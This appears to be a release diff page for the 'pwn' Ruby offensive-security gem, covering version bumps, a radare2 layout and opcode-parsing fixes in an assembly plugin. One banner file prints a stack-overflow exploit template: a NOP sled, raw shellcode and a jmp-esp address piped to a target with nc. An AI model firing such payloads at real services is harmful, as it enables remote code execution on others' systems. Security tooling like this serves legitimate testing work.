pwn 0.5.35 → 0.5.37
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/README.md +3 -3
- data/lib/pwn/banner/jmp_esp.rb +2 -2
- data/lib/pwn/banner/radare2.rb +3 -9
- data/lib/pwn/plugins/assembly.rb +26 -11
- data/lib/pwn/version.rb +1 -1
- data/third_party/r2-pwn-layout +1 -0
- metadata +3 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: bb526bdd28c2934926712cd69973337e9a3736350a1b914f5c3233dd2f7584d7
|
|
4
|
+
data.tar.gz: b808fff5507ebb35d94f535a196679ff95ff41255ed509efd2fe465aacefc500
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 9218c49c6d11ff327daa6b40c57753ea5a5ce5d84915c79369f822b03101cdc14fb6e4641ab91b6a8a6765fb59a5431b8739af7088d84eb06138597c5351d5d2
|
|
7
|
+
data.tar.gz: 32e89872dc6d39000bf9bb50abcc581a4387db007d137ef613b90b8516c3d0153e54cb40d922254c58b737a5705dca593a76935c6031ea2783fe26f26cfdbb88
|
data/README.md
CHANGED
|
@@ -37,7 +37,7 @@ $ cd /opt/pwn
|
|
|
37
37
|
$ ./install.sh
|
|
38
38
|
$ ./install.sh ruby-gem
|
|
39
39
|
$ pwn
|
|
40
|
-
pwn[v0.5.
|
|
40
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
|
41
41
|
```
|
|
42
42
|
|
|
43
43
|
[](https://youtu.be/G7iLUY4FzsI)
|
|
@@ -52,7 +52,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
|
52
52
|
$ gem uninstall --all --executables pwn
|
|
53
53
|
$ gem install --verbose pwn
|
|
54
54
|
$ pwn
|
|
55
|
-
pwn[v0.5.
|
|
55
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
|
56
56
|
```
|
|
57
57
|
|
|
58
58
|
If you're using a multi-user install of RVM do:
|
|
@@ -62,7 +62,7 @@ $ rvm use ruby-3.3.0@pwn
|
|
|
62
62
|
$ rvmsudo gem uninstall --all --executables pwn
|
|
63
63
|
$ rvmsudo gem install --verbose pwn
|
|
64
64
|
$ pwn
|
|
65
|
-
pwn[v0.5.
|
|
65
|
+
pwn[v0.5.37]:001 >>> PWN.help
|
|
66
66
|
```
|
|
67
67
|
|
|
68
68
|
PWN periodically upgrades to the latest version of Ruby which is reflected in `/opt/pwn/.ruby-version`. The easiest way to upgrade to the latest version of Ruby from a previous PWN installation is to run the following script:
|
data/lib/pwn/banner/jmp_esp.rb
CHANGED
|
@@ -12,10 +12,10 @@ module PWN
|
|
|
12
12
|
public_class_method def self.get
|
|
13
13
|
'
|
|
14
14
|
#!/bin/bash
|
|
15
|
-
|
|
15
|
+
crash=$(printf \'\x90%.0s\' {1..1337})
|
|
16
16
|
asm_ops=\'\xff\xe4\'
|
|
17
17
|
sh_code=\'\x6a\x14\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0c\x09\x11\xb5\x83\xeb\xfc\xe2\xf4\x3d\xd2\xe6\x56\x5f\x4a\x42\xdf\x0e\x80\xf0\x05\x6a\xc4\x91\xee\x52\x5b\x79\xb7\x0c\x0c\x28\xdf\x1c\x58\x41\x3c\xed\x63\x77\xed\xc1\x89\x98\xf4\x08\xba\x15\x05\x6a\xc4\x91\xf6\xbc\x6f\xdc\x35\x9f\x50\x7b\x8a\x54\xc4\x91\xfc\x75\xf1\x79\x9a\x23\x7a\x79\xdd\x23\x6b\x78\xdb\x85\xea\x41\xe6\x85\xe8\xa1\xbe\xc1\x89\x11\xb5\'
|
|
18
|
-
pwn="${
|
|
18
|
+
pwn="${crash}${sh_code}${asm_ops}"
|
|
19
19
|
echo -en $pwn | nc $TARGET $PORT
|
|
20
20
|
'.red
|
|
21
21
|
rescue StandardError => e
|
data/lib/pwn/banner/radare2.rb
CHANGED
|
@@ -11,15 +11,9 @@ module PWN
|
|
|
11
11
|
|
|
12
12
|
public_class_method def self.get
|
|
13
13
|
'
|
|
14
|
-
$
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
[0x7f000070776e]> afl ~..
|
|
18
|
-
[0x7f000070776e]> db main
|
|
19
|
-
[0x7f000070776e]> db
|
|
20
|
-
[0x7f000070776e]> dc
|
|
21
|
-
[0x7f000070776e]> pdg
|
|
22
|
-
[0x7f000070776e]> v
|
|
14
|
+
$ target_arm_bin="/usr/bin/id";
|
|
15
|
+
$ alias r2="setarch $(uname -m) -R r2 -AA -c \"v /opt/pwn/third_party/r2-pwn-layout\""
|
|
16
|
+
$ r2 -c "db (0x`readelf -S $target_arm_bin | grep text | awk "{print $NF}"`)+0x4+0x00000328" -c "ood" -c "dc" -c "v" $target_arm_bin
|
|
23
17
|
'.yellow
|
|
24
18
|
rescue StandardError => e
|
|
25
19
|
raise e
|
data/lib/pwn/plugins/assembly.rb
CHANGED
|
@@ -1,6 +1,8 @@
|
|
|
1
1
|
# frozen_string_literal: true
|
|
2
2
|
|
|
3
|
+
require 'cgi'
|
|
3
4
|
require 'metasm'
|
|
5
|
+
require 'tempfile'
|
|
4
6
|
|
|
5
7
|
module PWN
|
|
6
8
|
module Plugins
|
|
@@ -20,7 +22,7 @@ module PWN
|
|
|
20
22
|
|
|
21
23
|
raise 'ERROR: opcodes parameter is required.' if opcodes.nil?
|
|
22
24
|
|
|
23
|
-
case arch
|
|
25
|
+
case arch.to_s.downcase
|
|
24
26
|
when 'i386', 'i686', 'x86'
|
|
25
27
|
arch_obj = Metasm::Ia32.new(endian)
|
|
26
28
|
when 'amd64', 'x86_64'
|
|
@@ -33,19 +35,30 @@ module PWN
|
|
|
33
35
|
raise "Unsupported architecture: #{arch}"
|
|
34
36
|
end
|
|
35
37
|
|
|
36
|
-
# TOOD: Still needs a fix if opcodes
|
|
38
|
+
# TOOD: Still needs a fix if opcodes are passed in as:
|
|
37
39
|
# '\x90\x90\x90' (not to be confused w/ "\x90\x90\x90")
|
|
38
40
|
# '909090'
|
|
39
41
|
opcodes_orig_len = opcodes.length
|
|
40
|
-
opcodes = opcodes.
|
|
41
|
-
opcodes
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
42
|
+
opcodes = opcodes.join(',') if opcodes.is_a?(Array)
|
|
43
|
+
opcodes = CGI.escape(opcodes)
|
|
44
|
+
# puts opcodes.inspect
|
|
45
|
+
# Doesnt work with sommething like: "'ff', 'e4'"
|
|
46
|
+
# known to work with:
|
|
47
|
+
# 'ffe4'
|
|
48
|
+
# 'ff,e4'
|
|
49
|
+
# "ff,e4"
|
|
50
|
+
# ['ff', 'e4']
|
|
51
|
+
# ["ff", "e4"]
|
|
52
|
+
# '\xff\xe4'
|
|
53
|
+
# "\xff\xe4"
|
|
54
|
+
opcodes.delete!('%5Cx') if opcodes.include?('%5Cx')
|
|
55
|
+
opcodes.delete!('%2C') if opcodes.include?('%2C')
|
|
56
|
+
opcodes.delete!('%22') if opcodes.include?('%22')
|
|
57
|
+
opcodes.delete!('%27') if opcodes.include?('%27')
|
|
58
|
+
opcodes.delete!('+') if opcodes.include?('+')
|
|
59
|
+
opcodes.delete!('%') if opcodes.include?('%')
|
|
47
60
|
# puts opcodes.inspect
|
|
48
|
-
opcodes = [opcodes].pack('H*')
|
|
61
|
+
opcodes = [opcodes].pack('H*')
|
|
49
62
|
# puts opcodes.inspect
|
|
50
63
|
|
|
51
64
|
Metasm::Shellcode.disassemble(arch_obj, opcodes).to_s
|
|
@@ -65,9 +78,11 @@ module PWN
|
|
|
65
78
|
arch = opts[:arch] ||= PWN::Plugins::DetectOS.arch
|
|
66
79
|
endian = opts[:endian] ||= :little
|
|
67
80
|
|
|
81
|
+
asm_tmp = Tempfile.new('pwn_asm')
|
|
82
|
+
|
|
68
83
|
raise 'ERROR: asm parameter is required.' if asm.nil?
|
|
69
84
|
|
|
70
|
-
case arch
|
|
85
|
+
case arch.to_s.downcase
|
|
71
86
|
when 'i386', 'i686', 'x86'
|
|
72
87
|
arch_obj = Metasm::Ia32.new(endian)
|
|
73
88
|
when 'amd64', 'x86_64'
|
data/lib/pwn/version.rb
CHANGED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"Title":"Disassembly","Cmd":"pd","x":0,"y":1,"w":100,"h":38},{"Title":"Stack","Cmd":"pxq 256","x":0,"y":39,"w":100,"h":16},{"Title":"Hexdump","Cmd":"xc $r*16","x":0,"y":55,"w":100,"h":16},{"Title":"Registers","Cmd":"dr","x":100,"y":1,"w":35,"h":70},{"Title":"Function Calls","Cmd":"aflm","x":135,"y":1,"w":44,"h":70}
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: pwn
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.5.
|
|
4
|
+
version: 0.5.37
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- 0day Inc.
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-02-
|
|
11
|
+
date: 2024-02-26 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: activesupport
|
|
@@ -2185,6 +2185,7 @@ files:
|
|
|
2185
2185
|
- spec/spec_helper.rb
|
|
2186
2186
|
- third_party/.gitkeep
|
|
2187
2187
|
- third_party/http-request-headers-fields-large.txt
|
|
2188
|
+
- third_party/r2-pwn-layout
|
|
2188
2189
|
- update_pwn.sh
|
|
2189
2190
|
- upgrade_ruby.sh
|
|
2190
2191
|
- vagrant/provisioners/apache2.sh
|